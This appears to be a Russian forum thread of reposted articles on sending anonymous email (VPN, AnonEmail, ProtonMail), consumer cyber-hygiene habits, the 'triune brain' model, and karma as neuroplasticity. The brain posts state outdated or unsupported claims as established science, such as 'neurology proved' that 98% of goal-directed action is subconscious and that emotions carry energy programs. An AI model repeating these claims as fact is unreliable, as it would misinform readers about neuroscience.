Интересное, полезное.

[Merfi]

Иногда возникают ситуации, когда нужно отослать анонимное электронное письмо. Например, с красивым признанием в любви или передать информацию без возможности выявления источника. Существует множество легитимных причин для использования анонимной электронной почты. И здесь можно воспользоваться либо одним из бесплатных сервисов, либо временным аккаунтом в связке с VPN.
Рассмотрим пять способов.
1. Временная электронная почта и VPN

Сервисы наподобие Gmail – один из вариантов для работы с анонимной электронной почтой, поскольку при регистрации не нужно указывать персональные данные. Затем созданный адрес можно использовать на постоянной основе, если возникает необходимость отослать анонимное письмо.
Более того, при отсылке письма с Gmail в качестве адреса отправителя (откуда пришло письмо) в заголовке письма указывается сервера компании Google, а не ваш личный IP-адрес, что повышает уровень анонимности.
Если получатель письма захочет по заголовку отследить отправителя, то увидит только IP-адрес сервера Google, который необязательно будет находиться рядом с вами.

Однако следы все равно остаются, поскольку ваш фактический IP-адрес хранится на почтовых серверах. Таким образом, если правительство или другие органы, обладающие соответствующими полномочиями, сделают запрос, Google выдаст ваш настоящий IP-адрес.
Следующий шаг для повышения анонимности – использование виртуальной частной сети или VPN. Мы рекомендуем платные сервисыс хорошей репутацией.

Если отсылать электронную почту через VPN, то:
1. Адрес почтового сервера не будет совпадать с вашим местонахождением.
2. Если правительство сделает запрос, Google сможет выдать только адрес VPN.
Именно из-за второго пункта особенно важно использовать надежный сервис с хорошей репутацией, где не хранятся детали вашего подключения. В случае с бесплатным VPN вероятность хранения и передачи логов значительно повышается.
Примечание: не путайте анонимный временной адрес и одноразовую электронную почту.
2. Клиент электронной почты в связке с VPN

Второй метод для отсылки анонимных писем – использование клиента, установленного на компьютере. Анонимность достигается в три шага:

• Регистрация временного адреса в сервисах наподобие Gmail, Yahoo Mail, GMX и т. п.
• Установка Thunderbird или другого бесплатного клиента.
• Подключение к VPN.

Вначале нам нужно подключиться к VPN и убедиться, что весь трафик с компьютера идет через удаленный IP-адрес. Затем отсылаем письмо при помощи клиента, используя временной адрес. Таким образом, в заголовке вместо вашего IP-адреса будет указан адрес сервиса VPN.
3. AnonEmail

AnonEmail– сервис, позволяющий отправлять анонимные письма через цепочку случайных узлов. Соответственно, отследить IP-адрес отправителя становится практически невозможно.
AnonEmail легко использовать. Нужно указать получателя, тему письма, сообщение и нажать на кнопку «Send Anonymously». По сравнению с другими схожими сервисами AnonEMail не сохраняет (или делает вид, что не сохраняет) ваш IP-адрес. Во время тестирования мне не удалось отследить свой IP-адрес, однако отправлять что-то важное или незаконное все равно не рекомендуется.
В качестве дополнительной меры безопасности перед отсылкой письма AnonEmail ждет некоторое время, чтобы по времени отправки нельзя было отследить потенциальные географические зоны и часовые пояса вашего местонахождения.
4. Cyber Atlantis
Cyber Atlantis– еще один бесплатный сервис для отправки анонимных писем с сокрытием IP-адреса отправителя и поддержкой PGP-шифрования.
Таким образом, уровень безопасности становится еще выше, поскольку только владелец публичного ключа сможет расшифровать содержимое письма (при помощи секретного ключа). Однако при использовании схемы с публичным ключом могут возникнуть непредвиденные последствия. Например, если ключ шифрования есть только у ограниченного круга лиц, получатель письма может попытаться выяснить отправителя.
5. ProtonMail

Если требуется полностью безопасная, анонимная и двухстороння почтовая служба, ProtonMail – ваш выбор. Этот сервис, используемый миллионами людей, предоставляет услуги по безопасности электронной почты уже довольно давно.
Некоторые ключевые функции:

• Оконечное шифрование: шифруются все хранящиеся сообщения, а не только отправляемые с серверов ProtonMail. Без доступа к соответствующему аккаунту в сервисе ProtonMail, никто не сможет прочитать ваши сообщения.
• Полная защита пользовательских данных: во время шифрования используется ключ, хранящийся только на вашем компьютере. Таким образом, даже системные администраторы ProtonMail не могут получить доступ к вашим сообщениям. Недостаток схемы: администратор не сможет восстановить доступ к учетной записи. Достоинство: доступ также не может быть предоставлен по запросу правительства и других структур.
• Криптография с открытым исходным кодом: поскольку в ProtonMail используются библиотеки шифрования с открытым исходным кодом, можно быть уверенным в отсутствии «бэкдоров» для доступа к письмам как со стороны администраторов, так и со стороны хакеров.

Если вы регулярно отправляете анонимные письма, обратите внимание на сервис ProtonMail и используйте этот адрес в качестве основного.

Какой сервис лучше
Ответ на этот вопрос зависит от ваших потребностей. Если вы хотите поддерживать анонимность и безопасность на регулярной основе, обратите внимание на ProtonMail, поскольку даже администраторы сервиса не могут получить доступ к вашим письмам.
Если необходимость возникает не так часто, пользуйтесь одним из бесплатных веб-сервисов.

 

[Merfi]

Полезные привычки кибер-гигиены​

Хорошая гигиена — это то, чему тебя учат в детстве, и то, что обычно остается с тобой до конца жизни.
Вы слышали о кибер-гигиене? Конечно, чистка зубов и принятие душа — это не то, что традиционно ассоциируется с технологиями, но этот термин является полезной метафорой для необходимости принимать умные решения при использовании ваших интеллектуальных устройств.
Хорошая гигиена — это то, чему тебя учат в детстве, и то, что обычно остается с тобой до конца жизни. Она включает в себя три основных принципа: использование продуктов и инструментов, которые соответствуют вашим гигиеническим потребностям, правильное выполнение этих гигиенических задач и составление рутины.
Но что такое кибер-гигиена и какое отношение это имеет к вашему компьютеру и подключенным устройствам?
Cyber Hygiene — это обучение себя проактивному восприятию вашей кибербезопасности — как и вашей повседневной личной гигиене — противостоять киберугрозам и проблемам безопасности в сети. К сожалению, кибербезопасность все еще не воспринимается так серьезно, как чистка полости рта и мытье рук перед едой. Некоторые люди принимают кибербезопасность как нечто сугубо технологическое, но это может измениться, поскольку киберугрозы продолжают развиваться. Между тем, установление строгих правил кибергигиены должно быть таким же обычным делом, как чистка зубов.
Вот несколько советов, которые помогут вам и вашей семье задуматься о правильных правилах кибер-гигиены.
Используйте правильные инструменты для кибергигиены
Вы когда-нибудь пытались чистить зубы без зубной щетки? Без правильных инструментов для работы поддержание личной гигиены было бы немного сложнее, если не невозможно. То же самое верно для управления хорошей компьютерной гигиеной. Без правильных продуктов и инструментов личная информация, которую вы считаете безопасной, фактически может оказаться под угрозой.
Авторитетное антивирусное ПО, сетевой брандмауэр и защита паролем помогают защитить личные данные, хранящиеся на вашем домашнем компьютере. Взятые вместе, эти инструменты могут помочь вам чувствовать себя уверенно по поводу безопасности вашего домашнего компьютера, ноутбука, смартфона и других устройств.
Кроме того, перед установкой чего-либо на свой компьютер или другие устройства вы всегда должны убедиться, что производитель данного ПО и место, откуда вы его взяли — является надежным источником.
Будьте внимательны, будьте аккуратны с кибер-гигиеной
Каждый должен пользоваться зубной нитью, верно? Но все ли делают это так, как рекомендует стоматолог? Удаленные, по-видимому, безвозвратно файлы на вашем компьютере время от времени требуют особого внимания.
Например, вы можете подумать, что регулярная очистка мусорной корзины удаляет личные или конфиденциальные данные с жесткого диска. Это не так.
Чтобы окончательно удалить файлы с вашего компьютера, вы должны использовать программное обеспечение для очистки данных. Всякий раз, когда вы вводите новое программное обеспечение, добавляете оборудование или модифицируете системные файлы, вы рискуете потерять данные. Привыкайте регулярно удалять ненужные данные и вытирать их с жесткого диска с помощью невосстановимого стирания.
Еще одна область безопасности, требующая вашего внимания, — это защита паролем. Не ленитесь и не экономьте на создании сложных уникальных паролей для каждой учетной записи, используя комбинации из 12 букв, цифр и специальных символов. Регулярно меняйте пароли к своим учетным записям, и вы сразу же добьетесь лучшей кибергигиены. Если вы не в состоянии запомнить все ваши пароли, используйте специальное программное обеспечение – так называемые менеджеры паролей.
Сделать кибер-гигиену частью вашей рутины
Обучение регулярному мониторингу вашей кибербезопасности может повысить ваши шансы избежать онлайн-угроз. Но, как и любая привычка, которую вы хотите сделать привычкой, она требует рутины и повторения.
Начните с установки будильника или пометки календаря с датами для решения ряда задач, таких как сканирование на наличие вирусов с помощью антивирусного программного обеспечения, обновления операционных систем на всех ваших устройствах, проверки обновлений безопасности, очистки жесткого диска и изменения ваших паролей. Как только вы начнете овладевать кибергигиеной, она станет для вас второй натурой.
Ключевые шаги для хорошей компьютерной гигиены
Хорошая кибергигиена — это общая практика, которая может помочь вам обеспечить безопасность в сети, но есть несколько рекомендаций, которые помогут вам обеспечить максимальную безопасность вашей кибергигиены. Вот девять основных шагов.
Шаг 1. Установите авторитетное антивирусное и вредоносное программное обеспечение.
Первый и, возможно, самый важный шаг — установка антивирусного программного обеспечения. Для чего? Антивирусное программное обеспечение — это программа или комплекс программ, которые сканируют и уничтожают компьютерные вирусы и другие вредоносные программы. Это жизненно важный компонент вашей общей кибергигиены в защите от нарушений безопасности, а также других угроз.
В частности, антивирусное программное обеспечение обеспечивает защиту, выполняя ключевые задачи, в том числе следующие.

• Определение конкретных файлов для обнаружения вредоносного программного обеспечения.
• Планирование и выполнение автоматического сканирования.
• Сканирование либо одного конкретного файла, либо всего вашего компьютера, либо флэш-накопителя, в зависимости от ваших конкретных потребностей.
• Удаление вредоносного программного обеспечения.
• Подтверждение «здоровья» вашего компьютера и других устройств.

 

[Merfi]

Полезные привычки кибер-гигиены​

Шаг 2: Используйте сетевые брандмауэры
Использование сетевого брандмауэра является еще одной ключевой привычкой для поддержания хорошей компьютерной гигиены. Межсетевые экраны являются первой линией защиты в сетевой безопасности, предотвращая несанкционированный доступ пользователей к вашим веб-сайтам, почтовым серверам и другим источникам информации, доступ к которым можно получить из Интернета.
Шаг 3: регулярно обновляйте программное обеспечение
Регулярно обновляйте свои приложения, веб-браузеры и операционные системы, чтобы убедиться, что вы работаете с последними программами, в которых устранены или исправлены возможные сбои. Настройка этой функции на автоматическое обновление поможет обеспечить вам самые последние средства защиты.
Эти обновления особенно важны, потому что они часто включают исправления программного обеспечения. Разработчики программного обеспечения выпускают исправления безопасности всякий раз, когда обнаруживают недостатки программного обеспечения — недостатки, которые могут использовать вирусы или хакеры. Разработчики не всегда могут предупредить вас, когда был внедрен критический патч. Таким образом, регулярные обновления гарантируют, что эти патчи закроют все известные на момент их выпуска дыры в вашем программном обеспечении.
Шаг 4: Установите надежные пароли
Установка надежных паролей для всех ваших устройств имеет важное значение. Ваши пароли должны быть уникальными и сложными, содержать не менее 12 символов, а также цифры, символы, заглавные и строчные буквы. Регулярная смена ваших паролей необходима для того чтобы уменьшить вероятность их взлома злоумышленниками. Помните! Каждый пароль должен быть уникальным.
Дополнительные элементы управления устройства — пароли прошивки. В то время как шифрование диска препятствует доступу кибер-воров к информации, хранящейся на вашем устройстве, пароли встроенного ПО защищают ваше оборудование, предотвращая перезагрузку или сброс вашей машины без вашего пароля.
Шаг 5: Используйте многофакторную аутентификацию
Двухфакторная или многофакторная аутентификация — это лучшая практика, которая предлагает дополнительный уровень защиты. Для двухфакторной аутентификации обычно требуется, чтобы вы указали свой пароль и имя пользователя, а также, скажем, уникальный код, отправленный на ваш мобильный телефон. Это может быть все, что необходимо для некоторых систем, но многофакторная аутентификация добавляет дополнительные уровни безопасности с использованием биометрических данных, таких как распознавание лиц или отпечатков пальцев, чтобы хакерам было труднее получить доступ к вашему устройству и личной информации.
Шаг 6: Использовать шифрование устройства
Хотя в большинстве компаний автоматически применяются процессы шифрования данных, вам также может понадобиться шифровать ваши устройства и другие носители, содержащие конфиденциальные данные, включая ноутбуки, планшеты, смартфоны, съемные диски, ленты для резервного копирования и облачное хранилище. Фактически, многие устройства используют шифрование по умолчанию для данных, хранящихся на смартфонах. Некоторые приложения используют сквозное шифрование, а другие службы шифруют данные на ваших устройствах и сохраняют их в облаке. Другой вариант — использовать зашифрованную карту памяти USB для защиты конфиденциальных данных.
Шаг 7: регулярно делайте резервные копии
Также разумно защищать ваши файлы, создавая резервные копии важных файлов в автономном режиме, на внешнем жестком диске или в облаке. Это может помочь защитить от потери данных, особенно если хакеры получают доступ к одному из ваших устройств.
Шаг 8: Держите жесткий диск в чистоте
Если вы продаете свой ноутбук, планшет или смартфон, важно, чтобы ваша личная или конфиденциальная информация при этом не передавалась. Если ваше устройство взломано, чистый жесткий диск означает меньше информации, к которой осуществляется доступ.
Но простого удаления файлов или данных может быть недостаточно. Частью хорошей кибер-гигиены является переформатирование, а затем чистка жесткого диска. Например, если вы хотите продать свой компьютер и использовать его для онлайн-банкинга, вам следует рассмотреть возможность очистки диска для удаления программного обеспечения и данных с жесткого диска.
Шаг 9: Защитите свой маршрутизатор
Не забудьте защитить свою беспроводную сеть. Это включает в себя отключение и обновление имени по умолчанию и пароля, с которым маршрутизатор пришел от производителя, отключение удаленного управления и выход из системы в качестве администратора после его настройки. Кроме того, убедитесь, что ваш маршрутизатор предлагает шифрование WPA2 или WPA3, чтобы поддерживать наивысший уровень конфиденциальности информации, передаваемой через вашу сеть.
Помните, что практиковать хорошие кибер-гигиенические привычки — это разумно. Если вы настроите на своем компьютере и других устройствах авторитетные антивирусные программы, будете регулярно обновлять их, создавать надежные пароли и содержать все в чистоте, вы будете на пути к созданию кибернетических привычек, которые могут помочь вам обезопасить себя в сети.

 

[Merfi]

ТРИ МОЗГОВЫЕ СИСТЕМЫ.

Согласитесь, что хорошее знание любого устройства позволяет нам в нужный момент разобраться и понять, что с ним не так, что надо исправить и устранить. И наоборот, когда мы не знаем, как это работает, мы будем получать повторяющиеся негативные результаты. Точно так же и с нашим мозгом – зная его системы, характерные особенности и распределение их ответственности, мы будем лучше понимать себя, природу и сущность своего поведения.

Эти знания дают нам более глубокий уровень понимания, эффективный контроль над нашим поведением, и соответственно, возможность получать нужные нам результаты.
Представление о том, как функционирует мозг человека, даёт нам знания о том, где он может быть нашим союзником, а где, как ни странно, может тормозить наше движение. Разобравшись со взаимодействием его систем в контексте нашей темы, изучив навыки мозга, мы получим ключ к пониманию того, почему многие люди не могут достичь своей мечты, и как можно избежать напрасных усилий при её достижении.
Итак, заглянем внутрь своего мозга и посмотрим, как поживает эта «коммунальная квартира».
Все люди обладают триединой системой мозга, которая включает ретикулярный (рептильный) мозг, эмоциональный (лимбический) мозг и визуальный мозг (кора головного мозга, неокортекс).

1. Рептильный мозг (R-комплекс) – мозг млекопитающих.
Существует 100 млн. лет, он – самый древний. Оказывает фундаментальное влияние на наше поведение. Отвечает за безопасность вида и управляет базовым поведением. Это:
— инстинкт размножения,
— защита своей территории,
— агрессия,
— желание всем обладать и всё контролировать,
— следование шаблонам,
— имитация, обман,
— борьба за власть, стремление к иерархическим структурам,
— ритуальное поведение,
— контроль меньшинства.
Ему присущи хладнокровное поведение, отсутствие сопереживания, безразличие к последствиям наших действий относительно других людей. Говоря на современном языке – «победитель получает всё», «у кого сила, тот и прав», «победителей не судят». Не даром убийцу мы обычно называем «хладнокровным», а философ Николо Макиавелли провозглашал принцип «растить в себе зверя». Так же меня почему-то не покидает мысль, о том, что рептильный мозг ярко проявляет себя в поведении наших политиков, да и “власть имущих” вообще.
Его функции достаточно просты: «бежать – сражаться – замереть». Он очень полезен для немедленных реакций. Сначала – реакция, затем осмысление. В этом смысле это наш «автопилот», которым сознательно мы управлять не можем. Его главная задача – защита тела, он настроен на оборону, он всегда «на страже» и высматривает опасность для организма. Следовательно, он всегда воспринимает окружающий мир негативно, как полный угроз и подвохов.
Рептильный мозг видит мир совсем по-другому. В нём живут следы наших первобытных «рептильных» страхов, которые дети проявляют, казалось бы безо всяких оснований, едва научившись разговаривать. Может, не случайно, звук «п-с-с-с!», который обычно мы издаём, призывая к тишине или чтобы привлечь внимание, напоминает шипение наших предков-рептилий? Так же наш R-комплекс действует в наших снах, и мы всё ещё слышим топот динозавров. Его нельзя обойти или игнорировать, но эволюция позаботилась о том, чтобы притормаживать излишнюю активность рептильного мозга, создав в височных долях тормозящие центры. Днём активность R-комплекса подавляется неокортексом, но в состоянии сна он может снова активизироваться, и тогда мы переживаем первобытные страхи – мы боимся упасть или падаем, убегаем от преследования, испытываем сексуальные переживания.
Функция рептильного мозга, безусловно, полезна для выживания в случае реальных опасностей. Но, если состояние выживания становится сущностью всей жизни, вы попадете в его плен. Так же именно рептильный мозг в первую очередь становится объектом внешних манипуляций с целью внедрить вам постоянную боязнь «не выжить», пичкая информацией о кризисах, о росте цен, войнах, катастрофах, авариях, насилии, проводя болезненные реформы и многое другое, чем пугает нас современное общество от колыбели до самой могилы. Помните: под воздействием такого программирования вас пытаются «запереть» в рептильном мозгу, чтобы затем легко контролировать. Всё, что им нужно от нас – это наш страх.
Он так же иногда путает воображаемую опасность с реальной угрозой. В таких ситуациях рептильный мозг буквально берёт под контроль ваш разум и тело. В доисторические времена он хорошо охранял наше тело, но теперь часто тормозит наши трансформационные процессы, пока не убедится, что организму ничего не угрожает. Наверняка вы можете вспомнить, что в вашей жизни были моменты, когда рептильный мозг брал верх над вашим разумом, и вы «перереагировали» на ситуацию? В каком-то смысле наш рептильный мозг всё ещё выполняет в нас функции древних динозавров, или наших далеких и диких предков.

2. Лимбическая система – «эмоциональный мозг».
Его возраст 50 млн. лет, это наследство от древних млекопитающих. Он:
— отвечает за выживание особи, самосохранение и самозащиту;
— управляет социальным поведением, материнской заботой и воспитанием,
— участвует в регуляции функций внутренних органов, обоняния, инстинктивного поведения, переживаний, памяти, сна, бодрствования и др.
Этот мозг на 98% идентичен мозгу «братьев наших меньших». Кстати, может, именно потому мы так любим своих домашних питомцев? Эмоциональный мозг считается главным генератором эмоций, связывает эмоциональную и физическую деятельность. Здесь зарождаются страх, веселье, смена настроений. Кстати сказать, именно лимбическая система подвержена воздействию психотропных веществ. Нарушения в работе лимбической системы могут вызвать ничем не объяснимые приступы ярости, страха или чувствительности.
Эмоциональный мозг дарит нам «жизнь чувств». Важно знать, что это «однообразный мозг», он любит комфорт и рутину, стремится к безопасности и постоянству. Для эмоционального мозга безопасность – это делать сегодня то, что ты делал вчера, а завтра – то, что делал сегодня. Сотрудничая с рептильным мозгом, он переносит уроки прошлого на момент «сейчас» и не думает о будущем. Другими словами, он связывает все воспоминания так, как если бы события происходили в настоящем времени, и тогда вы переживаете чувства и эмоции из прошлого опыта.
«Гравитация» эмоционального мозга в своём стремлении сохранить то, что у нас уже есть, проявляется в сопротивлении переменам, она удерживает и тянет нас назад, в так называемую «зону комфорта» – status quo, как часть гомеостаза. Любые наши попытки выйти из неё для эмоционального мозга – стресс. Запомните это понятие – “зона комфорта”, оно крайне важно для понимания нашего поведения, когда мы решаемся на перемены.
Можно сказать, что это наш «заботливый и оберегающий родитель». Ему нравятся знакомые вам вещи: «мамина еда», всё, что радовало вас с самого детства, привычное окружение, поведение и обстановка. Каждое решение, которое вы собираетесь предпринять, проходит через его фильтр: «А хорошо ли это для меня? А безопасно ли это для моей семьи? Нет ли в этом угрозы?». И если что-то угрожает, вы отвергаете этот выбор. Другими словами, когда эмоциональный мозг принимает решения, он основывается на том, что близко вам и знакомо.
Когда вы чувствуете сопротивление переменам, это значит, что эмоциональный мозг управляет вашим разумом.
Его черты:
— живёт настоящим временем;
— аудиальность (коммуникации с помощью звуков и тонов);
— ориентация на жизнь в группе, его приоритет – выживание группы, семьи, клана;
— не знает вариантов, только «да» и «нет», «хорошо-плохо», «это или то»;
— ассоциативность с определёнными моментами жизни – когда мы думаем о чём-то, мы входим в образ и испытываем чувства.
Эмоциональный мозг не отличает угрозы нашему телу от угрозы нашему эго. Поэтому мы начинаем защищаться, даже не разобравшись в сущности ситуации. Когда кто-то задевает наши чувства, он выделяет адреналин, стимулирует приток крови к большим мышцам, мгновенно концентрирует наши мысли для защиты от угрозы.
Важно знать, что до того, как в вас начнут происходить какие-либо трансформационные процессы, эмоциональный мозг должен понять, что вся группа, семья или клан будут в безопасности. Его мышление устроено так, что он всегда будет искать проявления сходства. Например, при общении с новыми людьми он почувствует безопасность «зоны комфорта», когда убедится, что новый человек похож на вас. Это исполнение его функции «свой-чужой». Убедить его в этом – задача вашего разума.
«Всё, что вы хотите, находится сразу за зоной вашего комфорта», – говорит Роберт Аллен, соавтор книги «Миллионер за минуту».
Рептильная и эмоциональная системы мозга существуют вместе уже 50 млн. лет и очень хорошо взаимодействуют. Поэтому так важно понимать, что эти две крепко связанные системы часто могут брать контроль над разумом и телом. Для рептильного мозга угроза может быть физической, для эмоционального – эмоциональной. Например, потеря любви, страх неизведанного, или изменения, происходящие в жизни человека. Ваш эмоциональный мозг может отвергать все ваши усилия, допустим, когда вы худеете. Вместо того чтобы правильно питаться, вы ловите себя на том, что неосознанно тянетесь к пище. Эмоциональный мозг тому заслугой – он сконцентрирован на моменте «сейчас» и чутко следит за вашими желаниями в данный момент, и немедленно реализует все ваши привычки. Кто худел, тот знает: стоит потерять контроль, и тут же лишние калории у вас оказываются во рту.
Как же преодолеть «чуткую заботу» и привычки наших самых древних мозговых структур и добиться того, чего вы сознательно хотите? Вам необходимо узнать, как использовать силы визуального мозга.

 

[Merfi]

ТРИ МОЗГОВЫЕ СИСТЕМЫ.

3. Визуальный мозг (кора головного мозга, неокортекс – левое и правое полушария).
Это рациональный разум – самая молодая структура. Возраст 1,5 – 2,5 млн. лет. Он являет собой то, что мы называем рассудком:
— размышления,
— умозаключения,
— способность к анализу,
— в нём происходят познавательные процессы и т.п.
Он обладает пространственным мышлением, здесь возникают визуализационные картинки, сосредоточенность на будущем, его исследование и анализ. Имеет 16 трлн. соединительных нейронов, и занимает большую часть черепной коробки.
Человеческий мозг содержит около 10 в 13 степени синапсов. Синапс – это место контакта, щель между нейронами. Таким образом, число различных состояний, в которых он может находиться, представляет собой число 2, помноженное само на себя десять триллионов раз. Это невообразимо большое число, намного превышающее число всех электронов и протонов во Вселенной, которое меньше чем число 2, возведённое всего в степень 10 в кубе. Если попытаться записать число возможных комбинаций (вариантов связей) между его нейронами, то нули придётся записывать 75 лет! Это даёт невероятную гибкость мышления, колоссальные возможности видения будущего, жажду знаний.
С его помощью вы можете представить всё, что захотите!
Это ещё и наша «мыслемешалка» (примерно 60 000 мыслей в день!).
Этот мозг может определить:
— какие действия вам нужно предпринять,
— поставить цели и составить план,
— обсуждать ваши цели и мечты,
— вдохновить вас и стать причиной действий на короткий промежуток времени,
— с помощью логики принимать или отвергать идеи и цели.
Важно помнить, что сознательный мозг не отвечает за действия на долгосрочной основе. Сегодня нейрология доказала, что сознательный мозг отвечает за перспективные цели всего на 2%. Остальные 98% – ответственность нашего подсознания.
Поль Мак-Лин, автор модели структуры и эволюции мозга, которую он назвал “триединым мозгом”, говорил: “Мы должны посмотреть на себя и на мир глазами трёх совершенно разных личностей”, две из которых не вооружены речью.» Человеческий мозг, считает Мак-Лин, «равнозначен трём взаимосвязанным биологическим компьютерам», из которых каждый имеет «свой собственный разум, своё собственное чувство времени и пространства, собственную память, двигательную и другие функции».
Эмоция — энергия вырабатываемая подсознанием. Эта энергия соответствует информационной программе эмоции: испуг — энергия страха, обида — энергия обиды и т.д. Энергия эта несёт определённую программу — либо разрушительную, либо созидательную .

Чувства и эмоции отражают наше отношение к какому либо событию или человеку, причем эмоции — это непосредственная реакция на что-либо, на животном уровне, а чувства — больше продукт мышления, переживания, накопленного опыта и т.д.
Эмоции — это наша психическая реакция на события . сопровождается : изменением дыхания . пульса. жестов и т.д

 

[Merfi]

По теме мозга.

Карма мозга: обречены ли мы жить в иллюзии?​

Во всех духовных традициях есть представление о том, что наше восприятие реальности искажено. В индуизме говорится о “пелене иллюзии”, в христианстве – о том, что мы “видим мир гадательно, словно через тусклое стекло”. Нейроученая Венди Хэзенкамп (Wendy Hazenkamp) в своей статье для журнала Tricycle рассказывает о том, как современная наука объясняет возникновение этой иллюзии на уровне работы человеческого мозга. И о том, возможно ли это изменить.

Похоже, люди постоянно хотят что-то поменять: купить новейший гаджет, найти новую работу, улучшить свои отношения. Вещи, которые просто “такие, как есть”, не приносят им полного удовлетворения. Буддисты описывают эту ситуацию термином дуккха, обозначающим “страдание” и считают, что дуккха является неотъемлемой частью существования (хотя этот термин действительно часто переводится как “страдание”, по сути на пали дуккха означает “беспокойную нетерпеливость” – прим. пер.).
Мы часто верим, что можем достичь счастья, изменив какие-то внешние обстоятельства в нашей жизни и в нашем окружении. Мы игнорируем тот факт, что в значительной мере наши страдания поддерживаются и “увековечиваются” нашим собственным умом. Именно привычные шаблоны работы нашего ума определяют наше восприятие событий, наши эмоциональные реакции на других людей, а также то, как мы видим мир в целом: как “хороший” или как “изначально ущербный”.

Эти же шаблоны влияют на самые простые, базовые проявления нашей повседневной жизни. Наши психические и поведенческие привычки лежат в основе всего многообразия нашего жизненного опыта, и большинство из этих привычек мы просто не осознаем. Они управляют нашей жизнью, и в результате мы проживаем ее на автопилоте.

В буддизме эти привычки нашего ума имеют самое непосредственное отношение к концепции кармы. В каждый момент времени наше сознание не свободно, а жестко определено тем, в каком состоянии оно находилось в предыдущие моменты, и вся совокупность нашего прошлого опыта определяет всю совокупность нашего текущего опыта. Наши действия (к которым относится не только наше поведение, но также и мысли) оставляют следы в наших умах, и вероятность того, что в будущем мы поступим или подумаем также, увеличивается.
Корейский учитель дзен Даэнг Кун Сумин (Daehaeng Kun Sumin) описывает это так: “Люди часто относятся беспечно к тем мыслям, которым они позволяют появиться в своем уме. Они думают, что как только забудут эту мысль, она перестанет существовать. Это не так. Однажды проявившись в вашем уме, мысль продолжает функционировать, и однажды к вам возвращаются ее последствия”.
Но вот что поразительно – эти древние представления о карме (по крайней мере в том виде, в каком они описывают связь причины и следствия на протяжении одной жизни) с поразительной точностью отражают представления нейроученых о том, как работает наш мозг. Один из самых фундаментальных принципов современной нейронауки был сформулирован в 1949 году канадским нейропсихологом Дональдом Хеббом (Donald Hebb) и известен как “закон Хебба” или как “теория клеточных ансамблей”. В своей книге “Организация поведения: нейропсихологическая теория” он постулировал принцип взаимодействия нейронов, который часто описывают одной фразой – “нейроны, которые возбуждаются вместе, связываются вместе” (“Neurons that fire together, wire together”).

В этой основополагающей работе Хебб выдвинул предположение, что “любые две клетки или системы клеток, которые повторяющимся образом активны в одно и то же время, будут тяготеть к соединению, и активность в одной клетке или системе клеток будет способствовать активации другой клетки или системы клеток”. Это основная предпосылка нейропластичности – способности нашего мозга меняться в ответ на новый опыт.

Механизм нейропластичности был выявлен в результате многочисленных тщательных научных исследований, изучавших, как нейронные сети нашего мозга физически возникают и обновляются на микро-уровне. Представьте себе два нейрона, соединенных друг с другом таким образом, что активность первого нейрона повышает вероятность возбуждения второго нейрона. Если мы начнем снова и снова стимулировать два нейрона одновременно, через несколько часов точно такая же как и раньше стимуляция первого нейрона приведет к более сильному электрическому ответу со стороны второго нейрона.
Это связано с тем, что первая клетка начнет выделять больше химических нейротрансмиттеров, а вторая клетка сформирует больше рецепторов, способных воспринимать эти нейротрансмиттеры. Эти молекулярные изменения приведут к тому, что между двумя нейронами возникнут более прочные связи. Если такая совместная активация повторяется на протяжении длительного времени, нейроны физически меняют свою форму – отращивают новые дендриты, чтобы еще сильнее укрепить связь.
Это самый простой пример того, как две клетки взаимодействуют друг с другом, а в живом мозге ежесекундно происходят миллионы подобных взаимодействий. Каждый нейрон общается еще с тысячами других нейронов, порождая невероятно сложную сеть соединений. В результате непрерывного процесса возникновения новых устойчивый нейронных связей, в нашем мозге постепенно формируются новые нейронные сети, связанные с тем опытом, которые повторяется в нашей жизни чаще всего. Эти нейронные сети отражают наше личное знание о каждом конкретном объекте, человеке или ситуации, которое проявляется в нашем опыте как ощущения, воспоминания, эмоции, мысли и поведенческие реакции.

И по мере того, как мы проживаем нашу жизнь, те нейронные контуры, которые мы используем наиболее часто, становятся жесткими и невероятно устойчивыми. На практике это означает, что они включаются едва ли не на автомате, и их гораздо легче активировать по сравнению с новыми, ранее не использовавшимися, контурами. Для первичной активации этих старых контуров нужно меньше энергии, чем для активации новых, и тогда потакание своим привычкам становится в буквальном смысле “путем наименьшего сопротивления”.

Мозг можно сравнить с механизмом сохранения энергии: от 20 до 25% клеточной энергии нашего тела используется именно нашим мозгом (в то время как его вес составляет примерно 2% от веса тела), поэтому в результате мощного эволюционного давления мозг научился быть максимально эффективным и экономным. Подобно реке, которая предпочитает течь по своему руслу, вместо того, чтобы прокладывать себе новый путь к берегу, когда у мозга есть выбор между двумя действиями, он выбирает то, которое ему хорошо знакомо и повторялось много раз, потому что энергетически оно более выгодно.

 

[Merfi]

По теме мозга.

Карма мозга: обречены ли мы жить в иллюзии?​

Нетрудно заметить связь между этими исследованиями и концепией кармы. Любой наш субъективный опыт – идеи и мысли, эмоции и ощущения, поведение – имеют свое отражение на клеточном уровне. Миллионы нейронов оживают в сложных сетях взаимодействий, лежащих в основе каждого нашего переживания. Чем чаще воспроизводятся какие-то специфические шаблоны активности нашего ума, тем глубже становится определенная психическая колея. В результате, вовлекаясь в какую-то мысль или действие, мы более склонны в будущем повторять это вновь и вновь, так как каждая наша мысль и каждое наше действие активируют определенные нейронные связи.
С одной стороны, на это можно посмотреть просто как на механизм сохранения энергии или связь между биологической причиной и следствием. С другой стороны, это и есть закон кармы, ежедневно проявляющийся в нашей обычной жизни. Наш мозг в буквальном смысле становится тем, что мы думаем.
Эти кармические аспекты нейропластичности имеют важное применение. Согласно буддийским воззрениям, причиной страдания и непостоянства являются иллюзия и неведение – наша неспособность увидеть подлинную природу реальности. Вместо того, чтобы осознавать непостоянство и пустотность всех мирских проявлений, мы склонны рассматривать вещи как реально существующие и неизменные, обладающие независимым существованием. Мы относимся к людям и объектам вокруг нас как к отдельным, состоящим из разрозненных частей, и приписываем им некую врожденную личность. И мало того – мы вдобавок ко всему точно также относимся и к самим себе.

Это ошибочное восприятие реальности и является причиной дуккхи, в результате чего мы погружаемся в нескончаемый поток желаний и разочарований, единственной задачей которого является защита и поддержание нашего чувства “Я”.

А способность нашего мозга быть пластичным приводит к тому, что эта иллюзия поддерживается благодаря нейронному механизму, ответственному за процесс формирования понятий. Давайте рассмотрим пример того, как возникает новое понятие в ответ на новый визуальный стимул. (Этот пример взят из книги Томаса Льюиса, Фари Амини и Ричарда Лэннона “Общая теория любви”).
